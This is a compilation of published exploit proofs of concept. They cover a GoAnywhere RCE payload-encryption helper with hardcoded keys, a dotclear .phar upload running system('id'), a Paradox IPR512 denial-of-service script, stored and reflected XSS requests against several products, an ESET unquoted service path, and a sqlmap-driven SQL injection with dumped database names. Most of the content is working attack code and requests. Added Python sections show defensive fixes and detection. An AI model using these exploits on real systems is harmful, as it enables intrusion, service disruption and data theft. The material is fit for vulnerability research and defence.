<pre><code>// Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)<br />// Google Dork: title:"GoAnywhere"<br />// Date: 3/26/2023<br />// Exploit Author: Youssef Muhammad<br />// Vendor Homepage: https://www.goanywhere.com/<br />// Software Link: https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0<br />// Version: > 7.1.1 for Windows / > 7.0.3 for Linux<br />// Tested on: Windows, Linux<br />// CVE : CVE-2023-0669<br />// This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution<br /><br />import java.util.Base64;<br />import javax.crypto.Cipher;<br />import java.nio.charset.StandardCharsets;<br />import javax.crypto.SecretKeyFactory;<br />import javax.crypto.spec.PBEKeySpec;<br />import javax.crypto.spec.IvParameterSpec;<br />import javax.crypto.spec.SecretKeySpec;<br />import java.nio.file.Files;<br />import java.nio.file.Paths;<br />public class CVE_2023_0669_helper {<br /> static String ALGORITHM = "AES/CBC/PKCS5Padding";<br /> // Placeholder; replaced by the PBKDF2-derived key selected in encrypt()<br /> static byte[] KEY = new byte[30];<br /> // Static 16-byte IV: the ASCII bytes of the algorithm name<br /> static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);<br /> public static void main(String[] args) throws Exception {<br /> if (args.length != 2) {<br /> System.out.println("Usage: java CVE_2023_0669_helper &lt;file_path&gt; &lt;version&gt;");<br /> System.exit(1);<br /> }<br /> String filePath = args[0];<br /> String version = args[1];<br /> byte[] fileContent = Files.readAllBytes(Paths.get(filePath));<br /> String encryptedContent = encrypt(fileContent, version);<br /> System.out.println(encryptedContent);<br /> }<br /> public static String encrypt(byte[] data, String version) throws Exception {<br /> Cipher cipher = Cipher.getInstance(ALGORITHM);<br /> KEY = (version.equals("2")) ? 
getInitializationValueV2() : getInitializationValue();<br /> SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES");<br /> IvParameterSpec ivSpec = new IvParameterSpec(IV);<br /> cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);<br /> byte[] encryptedObject = cipher.doFinal(data);<br /> String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject);<br /> String v = (version.equals("2")) ? "$2" : "";<br /> bundle += v;<br /> return bundle;<br /> }<br /> private static byte[] getInitializationValue() throws Exception {<br /> // Version 1 Encryption<br /> String param1 = "go@nywhereLicenseP@$$wrd";<br /> byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85};<br /> return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded();<br /> }<br /> private static byte[] getInitializationValueV2() throws Exception {<br /> // Version 2 Encryption<br /> String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R";<br /> byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};<br /> return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded();<br /> }<br />}<br /> <br /><br /></code></pre>
<pre><code>Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)<br />Application: WebsiteBaker<br />Version: 2.13.3<br />Bugs: Stored XSS<br />Technology: PHP<br />Vendor URL: https://websitebaker.org/pages/en/home.php<br />Software Link: https://wiki.websitebaker.org/doku.php/en/downloads<br />Date found: 02.04.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux<br /><br /><br />2. Technical Details & POC<br />========================================<br />Steps:<br /><br />1. Anyone who has permission to create a page can do this.<br />Payload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3E<br /><br /><br />POST /admin/pages/add.php HTTP/1.1<br />Host: localhost<br />Content-Length: 137<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: null<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9<br />Connection: close<br /><br />b7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add<br /><br /><br /><br />2. Visit http://localhost/<br /><br /></code></pre>
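Added example, not part of the WebsiteBaker advisory: the PoC request body above is decoded the way the server decodes it, and the stored title is then rendered two ways, interpolated raw (the bug) and HTML-entity encoded at the point of output (the fix). The page-list markup is an assumption, not WebsiteBaker's real template.

```python
import html
import re
from urllib.parse import parse_qs

# Form body copied from the PoC request in the advisory (the first field is the
# advisory's CSRF token; it plays no part here).
POC_BODY = (
    "b7faead37158f739=dVhd_I3X7317NvoIzyGpMQ"
    "&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E"
    "&type=wysiwyg&parent=0&visibility=public&submit=Add"
)

# Matches an element start tag that carries an on* event-handler attribute.
ACTIVE_MARKUP = re.compile(r"<\w+[^>]*\son\w+\s*=", re.I)


def stored_title(body: str) -> str:
    """Return the 'title' field as add.php receives it after form decoding,
    i.e. the exact string that ends up in the pages table (no sanitisation)."""
    return parse_qs(body, keep_blank_values=True)["title"][0]


def render_vulnerable(title: str, page_id: int = 1) -> str:
    """Assumed page-list template that interpolates the stored title verbatim,
    so markup inside the title becomes part of every page that lists it."""
    return f'<li class="page"><a href="/pages/{page_id}">{title}</a></li>'


def render_fixed(title: str, page_id: int = 1) -> str:
    """Same template with entity encoding applied where the value is emitted.
    quote=True also encodes quotes, so the value stays inert inside attribute
    values (a value="" attribute, for instance), not only in element text."""
    safe = html.escape(title, quote=True)
    return f'<li class="page"><a href="/pages/{page_id}">{safe}</a></li>'


def contains_active_markup(fragment: str) -> bool:
    """Crude check used for the assertions: is an event-handler-bearing tag
    still present in the rendered fragment? Encoded output never matches."""
    return ACTIVE_MARKUP.search(fragment) is not None


if __name__ == "__main__":
    title = stored_title(POC_BODY)
    print("stored :", title)
    print("raw    :", render_vulnerable(title), contains_active_markup(render_vulnerable(title)))
    print("fixed  :", render_fixed(title), contains_active_markup(render_fixed(title)))
```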
<pre><code># Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)<br /># Date: 2023-03-30<br /># CVE: CVE-2023-26692<br /># Exploit Author: Abdulaziz Saad (@b4zb0z)<br /># Vendor Homepage: https://www.zcbs.nl<br /># Version: 4.14k<br /># Tested on: LAMP, Ubuntu<br /># Google Dork: inurl:objecten.pl?ident=<br /><br />---<br /><br />[#] Vulnerability:<br /><br />`$_GET['ident']`<br /><br /><br />[#] Exploitation:<br /><br />`https://localhost/cgi-bin/objecten.pl?ident=%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E`<br /><br /></code></pre>
<pre><code># Exploit Title: ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path<br /># Exploit Author: Milad Karimi (Ex3ptionaL)<br /># Exploit Date: 2023-04-05<br /># Vendor : https://www.eset.com<br /># Version : 16.0.26.0<br /># Tested on OS: Microsoft Windows 11 pro x64<br /><br />#PoC :<br />==============<br /><br />C:\>sc qc ekrn<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: ekrn<br /> TYPE : 20 WIN32_SHARE_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe"<br /> LOAD_ORDER_GROUP : Base<br /> TAG : 0<br /> DISPLAY_NAME : ESET Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /></code></pre>
<pre><code>Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)<br />Application: dotclear<br />Version: 2.25.3<br />Bugs: Remote Code Execution (RCE) (Authenticated) via file upload<br />Technology: PHP<br />Vendor URL: https://dotclear.org/<br />Software Link: https://dotclear.org/download<br />Date found: 08.04.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux<br /><br /><br />2. Technical Details & POC<br />========================================<br />While writing a blog post we can upload images, but PHP files are not allowed for upload. This time I wrote a file containing the payload below, gave it a poc.phar extension, and uploaded it:<br />&lt;?php echo system("id"); ?&gt;<br />We were able to run the PHP code when we visited the page.<br /><br /><br />PoC request:<br /><br /><br />POST /dotclear/admin/post.php HTTP/1.1<br />Host: localhost<br />Content-Length: 566<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1cc<br />Connection: close<br /><br 
/>post_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password=<br /><br /><br /><br />poc video : https://youtu.be/oIPyLqLJS70<br /><br /><br /></code></pre>
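Added example, not dotclear's code: the check that let poc.phar through behaves like a deny-list keyed on the `.php` extension, and the contrast below is an allow-list that also inspects the file's leading bytes. The extension sets are assumptions about a typical Apache/PHP deployment, not dotclear's actual configuration.

```python
import os

# Deny-list as commonly written: only the obvious PHP extension is rejected.
DENIED = {"php"}

# Extensions a default Debian/Ubuntu Apache PHP module configuration also hands to
# the interpreter (its FilesMatch pattern is ".+\.ph(ar|p|tml)$"). A ".php"-only
# deny-list therefore still lets server-executable files through.
PHP_LIKE = {"php", "phar", "phtml"}

# Allow-list for an image upload field, with the bytes each format must start with.
IMAGE_MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def extensions(filename: str) -> list:
    """All dotted suffixes of the base name, lower-cased: 'a.php.png' -> ['php', 'png']."""
    parts = os.path.basename(filename).lower().split(".")
    return parts[1:] if len(parts) > 1 and parts[0] else []


def deny_list_accepts(filename: str) -> bool:
    """The weak check: reject only when the last extension is on the deny-list."""
    exts = extensions(filename)
    return not exts or exts[-1] not in DENIED


def is_server_executable(filename: str) -> bool:
    """Would the web server run this file as PHP? True for poc.phar."""
    return any(e in PHP_LIKE for e in extensions(filename))


def allow_list_accepts(filename: str, head: bytes) -> bool:
    """The stronger check: every extension must be an allowed image type (so
    'shell.php.png' and 'poc.phar' both fail) and the content must start with
    the magic bytes of the type named by the final extension."""
    exts = extensions(filename)
    if not exts or any(e not in IMAGE_MAGIC for e in exts):
        return False
    return head.startswith(IMAGE_MAGIC[exts[-1]])


# Constructed sample uploads: (name, first bytes of content).
SAMPLES = [
    ("photo.png", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"),
    ("poc.phar", b'<?php echo system("id"); ?>'),
    ("shell.php.png", b"\x89PNG\r\n\x1a\n"),
    ("fake.png", b'<?php echo system("id"); ?>'),
]


def triage(samples=SAMPLES) -> dict:
    """Name -> (deny-list verdict, allow-list verdict, would execute as PHP)."""
    return {n: (deny_list_accepts(n), allow_list_accepts(n, h), is_server_executable(n))
            for n, h in samples}


if __name__ == "__main__":
    for name, v in triage().items():
        print(f"{name:15} deny-list={v[0]!s:5} allow-list={v[1]!s:5} php={v[2]}")
```

Storing accepted files under a server-generated name in a directory with script execution disabled is the complementary control; the checks above only decide what is accepted.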
<pre><code>#!/bin/bash<br /><br /># Exploit Title: Paradox Security Systems IPR512 - Denial Of Service<br /># Google Dork: intitle:"ipr512 * - login screen"<br /># Date: 09-APR-2023<br /># Exploit Author: Giorgi Dograshvili<br /># Vendor Homepage: https://www.paradox.com/Products/default.asp?PID=423<br /># Version: IPR512<br /># CVE : CVE-2023-24709<br /><br /># Function to display banner message<br />display_banner() {<br />    echo "******************************************************"<br />    echo "* *"<br />    echo "* PoC CVE-2023-24709 *"<br />    echo "* BE AWARE!!! RUNNING THE SCRIPT WILL MAKE *"<br />    echo "* A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! *"<br />    echo "* by SlashXzerozero *"<br />    echo "* *"<br />    echo "******************************************************"<br />}<br /><br /># Call the function to display the banner<br />display_banner<br />echo ""<br />echo ""<br />echo "Please enter a domain name or IP address with or without port"<br />read -p "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain<br /><br /># Step 2: Ask for user confirmation<br />read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm<br />if [[ $confirm == "Y" || $confirm == "y" ]]; then<br />    # Display loading animation<br />    animation=("|" "/" "-" "\\")<br />    index=0<br />    while [[ $index -lt 10 ]]; do<br />        echo -ne "Loading ${animation[index]} \r"<br />        sleep 1<br />        index=$((index + 1))<br />    done<br /><br />    # Use curl to send HTTP GET request with custom headers and timeout<br />    response=$(curl -i -s -k -X GET \<br />        -H "Host: $domain" \<br />        -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \<br />        -H "Accept: */*" \<br />        -H "Referer: http://$domain/login.html" \<br />        -H "Accept-Encoding: gzip, deflate" \<br />        -H "Accept-Language: en-US,en;q=0.9" \<br />        -H "Connection: close" \<br />        --max-time 10 \<br />        "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")<br /><br />    # Check response for HTTP status code 200 and print result<br />    if [[ $response == *"HTTP/1.1 200 OK"* ]]; then<br />        echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"<br />    else<br />        echo -e "\nShouldn't be vulnerable! Please check the webpanel: http://$domain/login.html"<br />    fi<br />else<br />    echo "The script is stopped!"<br />fi<br /><br /></code></pre>
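Added example, not from either advisory: detection logic for the two GET-based payloads on this page (the ZCBS `ident` parameter shown earlier and the IPR512 `log_user` parameter in the script just above), run over constructed Apache combined-format access-log lines. It percent-decodes every query parameter repeatedly, so double-encoded variants are seen as well, and flags values that decode to markup. It records attempts; it does not determine whether the target was actually affected.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format access-log lines. The request targets of the
# first two are the ones shown in the ZCBS and IPR512 advisories; hosts and IPs are
# invented, and the fourth line carries a double-encoded variant.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Mar/2023:10:15:01 +0000] "GET /cgi-bin/objecten.pl'
    '?ident=%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [09/Apr/2023:12:00:00 +0000] "GET /login.cgi'
    '?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [09/Apr/2023:12:00:05 +0000] "GET /cgi-bin/objecten.pl?ident=1234 HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [09/Apr/2023:12:00:09 +0000] "GET /login.cgi?log_user=%253Cscript%253E&r=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# An opening/closing tag, an on* handler attribute, or a javascript: URL.
MARKUP = re.compile(r"</?[a-z][\w-]*[\s/>]|\son[a-z]+\s*=|javascript:", re.I)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so a payload
    hidden behind double encoding is inspected in its final form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target: str) -> list:
    """(name, decoded value) for each query parameter whose value decodes to markup."""
    hits = []
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for raw in values:  # parse_qs has already applied one decoding pass
            decoded = fully_decode(raw)
            if MARKUP.search(decoded):
                hits.append((name, decoded))
    return hits


def scan_access_log(lines) -> list:
    """One finding per (request, parameter) pair that carries markup."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line in the expected format; skip it
        for name, decoded in suspicious_params(m["target"]):
            findings.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                             "path": urlsplit(m["target"]).path, "param": name, "value": decoded})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']:13} {f['path']:22} {f['param']}={f['value']!r} -> {f['status']}")
```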
<pre><code># Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)<br /># Exploit Author: omurugur<br /># Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020<br /># Version: 6.5.0 - 6.2.0 - 6.1.0<br /># Tested on: [relevant os]<br /># CVE : CVE-2022-0020<br /># Author Web: https://www.justsecnow.com<br /># Author Social: @omurugurrr<br /><br /><br />A stored cross-site scripting (XSS) vulnerability in the Palo Alto Networks<br />Cortex XSOAR web interface enables an authenticated network-based attacker<br />to store a persistent JavaScript payload that will perform arbitrary<br />actions in the Cortex XSOAR web interface on behalf of authenticated<br />administrators who encounter the payload during normal operations.<br /><br />POST /acc_UAB(MAY)/incidentfield HTTP/1.1<br />Host: x.x.x.x<br />Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x; isTimLicense=false<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: application/json<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://x.x.x.x/acc_UAB(MAY)<br />Content-Type: application/json<br />X-Xsrf-Token:<br />Api_truncate_results: true<br />Origin: https://x.x.x.x<br />Content-Length: 373<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/&gt;&lt;svg/onload=prompt(document.domain)&gt;","editForm":true,"commitMessage":"Field edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/&gt;&lt;svg/onload=prompt(document.domain)&gt;","group":0,"required":false}<br /><br />Regards,<br /><br />Omur UGUR<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)<br /># Exploit Author: omurugur<br /># Vendor Homepage: https://support.broadcom.com/external/content/SecurityAdvisories/0/21117<br /># Version: 10.7.4-10.7.13<br /># Tested on: [relevant os]<br /># CVE : CVE-2022-25630<br /># Author Web: https://www.justsecnow.com<br /># Author Social: @omurugurrr<br /><br /><br />An authenticated user can embed malicious content with XSS into the admin<br />group policy page.<br /><br />Example payload:<br /><br />*"/&gt;&lt;svg/onload=prompt(document.domain)&gt;*<br /><br /><br />POST /brightmail/admin/administration/AdminGroupPolicyFlow$save.flo HTTP/1.1<br />Host: X.X.X.X<br />Cookie: JSESSIONID=xxxxx<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 652<br />Origin: https://x.x.x.x<br />Referer: https://x.x.x.x/brightmail/admin/administration/AdminGroupPolicyFlow$add.flo<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br />Connection: close<br /><br 
/>pageReuseFor=add&symantec.brightmail.key.TOKEN=xxx&adminGroupName=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=&fullAdminRole=true&statusRole=true&statusViewOnly=false&reportRole=true&reportViewOnly=false&policyRole=true&policyViewOnly=false&settingRole=true&settingViewOnly=false&adminRole=true&adminViewOnly=false&submitRole=true&submitViewOnly=false&quarantineRole=true&quarantineViewOnly=false&selectedFolderRights=2&ids=0&complianceFolderIds=1&selectedFolderRights=2&ids=0&complianceFolderIds=10000000<br /><br /><br />Regards,<br /><br />Omur UGUR<br /><br /></code></pre>
<pre><code># Exploit Title: Medicine Tracker System v1.0 - SQL Injection<br /># Exploit Author: Sanjay Singh<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip<br /># Version: V1.0.0<br /># Tested on: Windows/Linux<br /><br /><br /># Proof of Concept:<br /># 1- http://localhost/php-mts/app/login.php<br /># 2- Log in with the default credentials<br /># 3- Click Manage Account in the left-hand menu, fill in Update User Details and click Update Account<br /># 4- Capture the request using Burp Suite<br /># 5- Save the request as request.txt<br /><br /><br />Captured request (request.txt):<br /><br />POST /php-mts/classes/Users.php?f=save_user HTTP/1.1<br />Host: localhost<br />Content-Length: 661<br />sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeOo3CzyRX6fHexZx<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/php-mts/app/?page=manage_account<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql<br />Connection: close<br /><br />------WebKitFormBoundaryeOo3CzyRX6fHexZx<br />Content-Disposition: form-data; name="id"<br /><br />1'-'<br />------WebKitFormBoundaryeOo3CzyRX6fHexZx<br />Content-Disposition: form-data; name="firstname"<br /><br />gogo<br />------WebKitFormBoundaryeOo3CzyRX6fHexZx<br />Content-Disposition: form-data; name="middlename"<br /><br />ogo<br />------WebKitFormBoundaryeOo3CzyRX6fHexZx<br />Content-Disposition: form-data; name="lastname"<br /><br />singh<br 
/>------WebKitFormBoundaryeOo3CzyRX6fHexZx<br />Content-Disposition: form-data; name="username"<br /><br />mayuri.infospace@gmail.com<br />------WebKitFormBoundaryeOo3CzyRX6fHexZx<br />Content-Disposition: form-data; name="password"<br /><br />12345678<br />------WebKitFormBoundaryeOo3CzyRX6fHexZx--<br /><br /><br /><br /><br /><br />sqlmap<br /><br />sqlmap -r request.txt -p "id" --dbs --batch <br /> ___<br /> __H__ <br /> ___ ___["]_____ ___ ___ {1.6.12#stable} <br />|_ -| . ['] | .'| . | <br />|___|_ [(]_|_|_|__,| _| <br /> |_|V... |_| https://sqlmap.org <br /><br />[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program<br /><br />[*] starting @ 13:18:01 /2023-03-21/<br /><br />[13:18:01] [INFO] parsing HTTP request from 'request.txt'<br />it appears that provided value for POST parameter 'id' has boundaries. Do you want to inject inside? 
('' or true*--') [y/N] N<br />[13:18:01] [INFO] resuming back-end DBMS 'mysql' <br />[13:18:01] [INFO] testing connection to the target URL<br />[13:18:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests<br />sqlmap resumed the following injection point(s) from stored session:<br />---<br />Parameter: id (POST)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: id=' or true AND (SELECT 3138 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(3138=3138,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mDhI--&name=para&description=ss<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=' or true AND (SELECT 8994 FROM (SELECT(SLEEP(5)))doso)-- HjCh--&name=para&description=ss<br />---<br />[13:18:01] [INFO] the back-end DBMS is MySQL<br />web application technology: Apache 2.4.54, PHP 8.0.25<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br />[13:18:01] [INFO] fetching database names<br />[13:18:01] [INFO] resumed: 'information_schema'<br />[13:18:01] [INFO] resumed: 'art_gallery'<br />[13:18:01] [INFO] resumed: 'hcpms'<br />[13:18:01] [INFO] resumed: 'mts_db'<br />[13:18:01] [INFO] resumed: 'mysql'<br />[13:18:01] [INFO] resumed: 'performance_schema'<br />[13:18:01] [INFO] resumed: 'phpmyadmin'<br />[13:18:01] [INFO] resumed: 'sscdms_db'<br />[13:18:01] [INFO] resumed: 'test'<br />available databases [9]:<br />[*] art_gallery<br />[*] hcpms<br />[*] information_schema<br />[*] mts_db<br />[*] mysql<br />[*] performance_schema<br />[*] phpmyadmin<br />[*] sscdms_db<br />[*] test<br /><br />[13:18:01] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.2'<br /><br />[*] ending @ 13:18:01 /2023-03-21/<br /><br /><br /></code></pre>
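Added example, not the application's code: the `save_user` handler's `id` field rebuilt two ways in Python over an in-memory SQLite table, string-concatenated (the pattern sqlmap exploited above) and parameterised. The same `' or true` prefix sqlmap reported shows up as every row updated in the first and no row updated in the second. The table layout is an assumption.

```python
import sqlite3

# The injection prefix sqlmap reported for this parameter; the trailing space keeps
# the '--' comment valid. SQLite >= 3.23 accepts TRUE as MySQL does.
INJECTED_ID = "' or true -- "


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's users table (three accounts)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, firstname TEXT, username TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "admin", "admin@example.test"),
        (2, "alice", "alice@example.test"),
        (3, "bob", "bob@example.test"),
    ])
    con.commit()
    return con


def save_user_vulnerable(con, user_id: str, firstname: str) -> int:
    """The bug: the 'id' form field is pasted into the SQL text. With the
    injected value the statement becomes
        UPDATE users SET firstname = '...' WHERE id = '' or true -- '
    so the WHERE clause is always true and every row is changed."""
    sql = f"UPDATE users SET firstname = '{firstname}' WHERE id = '{user_id}'"
    cur = con.execute(sql)
    con.commit()
    return cur.rowcount


def save_user_fixed(con, user_id: str, firstname: str) -> int:
    """The fix: bound parameters keep the value out of the SQL text, so the
    same input is compared as a literal string to id and matches no row.
    (Checking that id is an integer before the query is a further layer.)"""
    cur = con.execute("UPDATE users SET firstname = ? WHERE id = ?", (firstname, user_id))
    con.commit()
    return cur.rowcount


def firstnames(con) -> list:
    """Current firstname column in id order, for inspecting the effect."""
    return [row[0] for row in con.execute("SELECT firstname FROM users ORDER BY id")]


if __name__ == "__main__":
    con = make_db()
    print("fixed, id=1      :", save_user_fixed(con, "1", "gogo"), firstnames(con))
    print("fixed, injected  :", save_user_fixed(con, INJECTED_ID, "pwned"), firstnames(con))
    print("vulnerable, same :", save_user_vulnerable(con, INJECTED_ID, "pwned"), firstnames(con))
```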
